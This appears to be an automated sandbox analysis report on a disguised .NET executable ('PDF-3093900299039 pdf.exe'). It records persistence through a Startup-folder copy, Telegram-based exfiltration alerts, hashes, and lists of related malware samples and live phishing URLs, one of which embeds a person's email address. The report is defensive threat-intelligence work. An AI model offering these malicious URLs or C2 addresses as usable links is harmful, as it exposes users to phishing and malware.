	https://telegrams-mc.org/	Get hash	malicious	Unknown	Browse	149.154.170.96
	https://telegramerong.cc/app/	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://telegramerong.cc/app	Get hash	malicious	Telegram Phisher	Browse	149.154.167.99
	https://telegrams-mh.org/	Get hash	malicious	Unknown	Browse	149.154.170.96
UTMEMUS	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	rlPy5vt1Dg.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	wZ6VEnOkie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	tNXl4XhgmV.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
CLOUDFLARENETUS	https://smartbooking.ma/	Get hash	malicious	Unknown	Browse	188.114.97.3
	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	https://connexion-pro.support/adobe/s/assets/	Get hash	malicious	Unknown	Browse	104.21.11.138
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	g5.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://aeromorning.com	Get hash	malicious	Unknown	Browse	104.26.4.102
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	elitebotnet.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	172.68.1.238
	MACHINE SPECIFICATIONS.exe	Get hash	malicious	FormBook	Browse	172.67.132.227
	Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Get hash	malicious	FormBook	Browse	104.21.13.141

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	Loader.exe	Get hash	malicious	Unknown	Browse	104.21.32.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.32.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
3b5074b1b5d032e5620f69f9f700ff0e	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	rRef6010273.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipping Docs Waybill No 2009 xxxx 351.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	wuknbFMdeq.exe	Get hash	malicious	FunkLocker	Browse	149.154.167.220
	rCHARTERREQUEST.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	https://www.flndmy.er-xu.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://support.wt-nx.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.maps-s.xz-sr.com/aU3V88/c1.php	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3107912875994616
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvry:KooCEYhgYEL0In
MD5:	20B2EDC79D1A7A35723F799997A7B405
SHA1:	9CD198D24666D287C72F91AE7E917D4EBB2306AA
SHA-256:	09761723937026D1756E907F3236A88B0BAA9325BCF40CC9D762CA3A5C9AD15E
SHA-512:	8808B2429E3A8F368DB5E5CC03349FC6467E230CC9A5368A9FA21CFC15F4741BBBC9D8FE8BE5BADFD041E77A256C01901C115EA75E816F68EB3D2D850D131642
Malicious:	false
Reputation:	low
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xf56d84c8, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221716916508341
Encrypted:	false
SSDEEP:	1536:XSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:Xazag03A2UrzJDO
MD5:	98E5087A28F97F1B47122272AF846B68
SHA1:	F38AC1D3CA8C7408129E73CD60E07C46126AD2E0
SHA-256:	97FC604CC83A05EE55156B12A213D258FF61C26F3A97380045BD5258269B1A4C
SHA-512:	00873DDA980D6381D0DEEFDB84F835D93FF52371CE951494F4480BA9CB93CB7891A2FDE19911BF3440138AEB14CF0150C1F714EA78DA431EB2EAF73588FF8EC6
Malicious:	false
Preview:	.m..... .......Y.......X\...;...{......................n.%..........}3......}..h.#..........}3.n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................Z~......}3.........................}3..........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0790369498641779
Encrypted:	false
SSDEEP:	3:cOetYeXsuomm53xo0hHhl/l/uhtollOE/tlnl+/rTc:crzXPOBo0XtlAGpMP
MD5:	E05CB875D222232DBEAF199F2917D828
SHA1:	77E0C9C73E312A60DB403BEC208B4E55A968F070
SHA-256:	7C787AACB8F83A507646D8F443BDEA8E4E960953C828346554BC790A7CF823DF
SHA-512:	73A50215A29C191C54B3EBE4A77EB744FC325204F7E9BDC5C5E59D9482DEEB89C8B409AF34898975E9E3B54FAA0DB12B018537BA945C2C5430E6D5F523693F3C
Malicious:	false
Preview:	.e.....................................;...{.......}'......}3..............}.......}3....&.....}..........................}3.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.374943752685652
Encrypted:	false
SSDEEP:	24:3vZ4WSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:SWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
MD5:	6D4EE74EAFA8BF21C74F668252755180
SHA1:	76AF34C15CE14EE2D377E991DE3DB9D9E9C81C9F
SHA-256:	5391D8915A78448F6111131D8ECA5C22BB03C620A608322B277E52457BB2174A
SHA-512:	F2FA682EDA0A6E2E17D049B686D52E3E458666E986F1197E6B1007ADD07C348E27E557139B5E360F44149E40680CAED2D5B17850481D6A37FAE080E0D26F382E
Malicious:	false
Preview:	@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ozujgi0.gtu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lybjmzsn.0fu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rp4cuuis.oja.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfdjqddg.a1u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1043968
Entropy (8bit):	7.056999631903552
Encrypted:	false
SSDEEP:	24576:rMaSSKy2/SPNichdpPEcw88Cco4H4444C:rRQrc5PEcwi4H4444C
MD5:	1F74495F02AD58FF437B07CF58A3E0AD
SHA1:	9EFD59D289256116E9F539FFD7CC319603AC03BA
SHA-256:	CD7AA2BCA4B3612823B7E73160896E886A3E3DDD495C3AE7F2B47868C5DFF0CF
SHA-512:	14075253CC9E49A6DC9AF8544F82DB2BB4DFA814390739E6BC5D0D8F6CA74DBF6E989585977F968A1905F4D7C55220C11617886F6DC29A4FCECE97B608FEEECD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 61% Antivirus: Virustotal, Detection: 64%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............^.... ........@.. .......................@............@.....................................S.......T.................... ....................................................... ............... ..H............text...d.... ...................... ..`.rsrc...T...........................@..@.reloc....... ......................@..B................@.......H........!..`...........D...d@..........................................&.(......".......".(.....Vs....(....t.........v..}.....(......(....&.(.....f.r...p.r...p.(2...(3......N.s4...}.....(.....j.(5.....(6....s....(7....N.s4...}.....(.....N.s4...}.....(......(.........N.s4...}.....(.....F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X....a...6.~.....(Y...F.~....(X........J.~..........(Z...F.~....(X....a...6.~.....(Y...*F.~....(X......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.056999631903552
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PDF-3093900299039 pdf.exe
File size:	1'043'968 bytes
MD5:	1f74495f02ad58ff437b07cf58a3e0ad
SHA1:	9efd59d289256116e9f539ffd7cc319603ac03ba
SHA256:	cd7aa2bca4b3612823b7e73160896e886a3e3ddd495c3ae7f2b47868c5dff0cf
SHA512:	14075253cc9e49a6dc9af8544f82db2bb4dfa814390739e6bc5d0d8f6ca74dbf6e989585977f968a1905f4d7c55220c11617886f6dc29a4fcece97b608feeecd
SSDEEP:	24576:rMaSSKy2/SPNichdpPEcw88Cco4H4444C:rRQrc5PEcwi4H4444C
TLSH:	81256C943B7048B8C536D9F6B9E3827C6A71B86121E2D42635CF2E4C7CC9B8056D31AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0................0.............^.... ........@.. .......................@............@................................

File Icon


Icon Hash:	98306e8c8cb6828c

Static PE Info

General

Entrypoint:	0x4ef85e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF79C3086 [Tue Aug 23 02:46:30 2101 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xef808	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf0000	0x10e54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x102000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xed864	0xeda00	fd6dc9ddd038900adafa2980b8848502	False	0.4634104994082062	data	7.290668751533855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf0000	0x10e54	0x11000	3cebdefebc7aa624f266e8325c1df7cd	False	0.05483111213235294	data	1.5066880831361027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x102000	0xc	0x200	996516a8383c88ac14193ffd0b734fca	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xf0130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.045353720572577784
RT_GROUP_ICON	0x100958	0x14	data	1.0
RT_VERSION	0x10096c	0x2fc	data	0.43455497382198954
RT_MANIFEST	0x100c68	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T12:08:09.909474+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.8.169	80	TCP
2025-01-13T12:08:10.940721+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49730	132.226.8.169	80	TCP
2025-01-13T12:08:11.496106+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49735	104.21.32.1	443	TCP
2025-01-13T12:08:12.393944+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49736	132.226.8.169	80	TCP
2025-01-13T12:08:12.958118+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49738	104.21.32.1	443	TCP
2025-01-13T12:08:21.253202+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	132.226.8.169	80	TCP
2025-01-13T12:08:22.253242+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49748	132.226.8.169	80	TCP
2025-01-13T12:08:22.862735+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49755	104.21.32.1	443	TCP
2025-01-13T12:08:22.885124+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49756	104.21.32.1	443	TCP
2025-01-13T12:08:23.765386+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49760	149.154.167.220	443	TCP
2025-01-13T12:08:23.846956+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49759	132.226.8.169	80	TCP
2025-01-13T12:08:27.383740+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49767	104.21.32.1	443	TCP
2025-01-13T12:08:32.634045+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49773	149.154.167.220	443	TCP
2025-01-13T12:08:34.618729+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49776	104.21.32.1	443	TCP
2025-01-13T12:08:35.524227+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49777	149.154.167.220	443	TCP
2025-01-13T12:08:43.414538+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.4	49778	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 12:08:07.099356890 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:07.104254007 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:07.104336977 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:07.104523897 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:07.109365940 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:08.976592064 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:09.023787022 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:09.029398918 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:09.859023094 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:09.904186010 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:09.904283047 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:09.904371023 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:09.909473896 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:09.911415100 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:09.911454916 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.397248983 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.397358894 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.402823925 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.402868032 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.403337002 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.456341982 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.457562923 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.499360085 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.571261883 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.571470976 CET	443	49734	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.571543932 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.577229977 CET	49734	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.580598116 CET	49730	80	192.168.2.4	132.226.8.169
Jan 13, 2025 12:08:10.585494995 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:10.897963047 CET	80	49730	132.226.8.169	192.168.2.4
Jan 13, 2025 12:08:10.907630920 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.907660961 CET	443	49735	104.21.32.1	192.168.2.4
Jan 13, 2025 12:08:10.907728910 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.907983065 CET	49735	443	192.168.2.4	104.21.32.1
Jan 13, 2025 12:08:10.907994986 CET	443	49735	104.21.32.1	192.168.2.4
